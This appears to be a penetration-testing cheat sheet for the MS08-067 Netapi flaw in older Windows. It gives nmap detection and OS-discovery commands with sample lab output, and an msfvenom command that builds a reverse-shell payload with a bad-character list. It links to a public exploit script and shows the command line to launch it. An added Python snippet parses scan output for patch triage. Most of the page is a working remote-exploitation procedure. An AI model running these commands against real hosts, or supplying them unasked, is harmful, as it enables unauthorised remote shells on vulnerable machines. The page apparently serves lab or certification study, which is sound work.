# MS08-067 - Netapi

Detecting it:

```
sudo nmap --script=smb-vuln-ms08-067 10.3.3.7
```

Generating reverse shell payload

```
msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
```

Detecting target version

```
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.3.3.7
```

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 00:20 +03
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.227 (10.11.1.227)
Host is up (0.13s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-os-discovery: 
|   OS: Windows 2000 (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_2000::-
|   Computer name: jd
|   NetBIOS computer name: JD\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-02-26T23:20:47+02:00

Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds
```
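For triaging scan results on the defensive side, the following added example (not part of the original page) parses nmap normal output like the listing above and lists hosts whose reported OS falls in a Windows family covered by the MS08-067 bulletin, so their patch state can be verified. The second host in the sample, the `AFFECTED` pattern and the function names are constructed for illustration.

```python
import re

# Constructed sample: the smb-os-discovery result shown above (shortened),
# plus a second made-up host, in nmap's normal output format.
SAMPLE = r"""Nmap scan report for 10.11.1.227 (10.11.1.227)
Host script results:
| smb-os-discovery:
|   OS: Windows 2000 (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_2000::-
|   NetBIOS computer name: JD\x00
|_  System time: 2022-02-26T23:20:47+02:00

Nmap scan report for 192.0.2.10
Host script results:
| smb-os-discovery:
|   OS: Windows 10 Pro 19045 (Windows 10 Pro 6.3)
|_  Computer name: ws01
"""

# Assumption: heuristic match on the OS families named in the MS08-067 bulletin.
# A match means "verify the patch", not "vulnerable"; Server 2008 R2 is excluded.
AFFECTED = re.compile(r"Windows (2000|XP|Vista|Server (\(R\) )?(2003|2008(?! R2)))")

def parse_hosts(text):
    """Return {ip: {field: value}} for every host with smb-os-discovery output."""
    hosts, ip, in_script = {}, None, False
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (?:\S+ \()?([\d.]+)\)?", line)
        if m:
            ip, in_script = m.group(1), False
        elif line.startswith("| smb-os-discovery:"):
            in_script = ip is not None
            if in_script:
                hosts[ip] = {}
        elif in_script and line.startswith(("|   ", "|_  ")):
            key, _, value = line[4:].partition(": ")
            # nmap prints the NUL padding of NetBIOS names as a literal "\x00"
            hosts[ip][key] = value.replace("\\x00", "").strip()
            in_script = not line.startswith("|_")  # "|_" marks the last line
        else:
            in_script = False
    return hosts

def needs_patch_check(hosts):
    """IPs whose reported OS is in an affected family (patched or not)."""
    return sorted(ip for ip, f in hosts.items() if AFFECTED.match(f.get("OS", "")))

if __name__ == "__main__":
    print(needs_patch_check(parse_hosts(SAMPLE)))
```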

Exploiting it:

* <https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py>

```
python2 ms08-067.py 10.3.3.7 2 139
```

Note that the second argument, `2`, is chosen based on the target version detected above (Windows 2000 in the sample output).
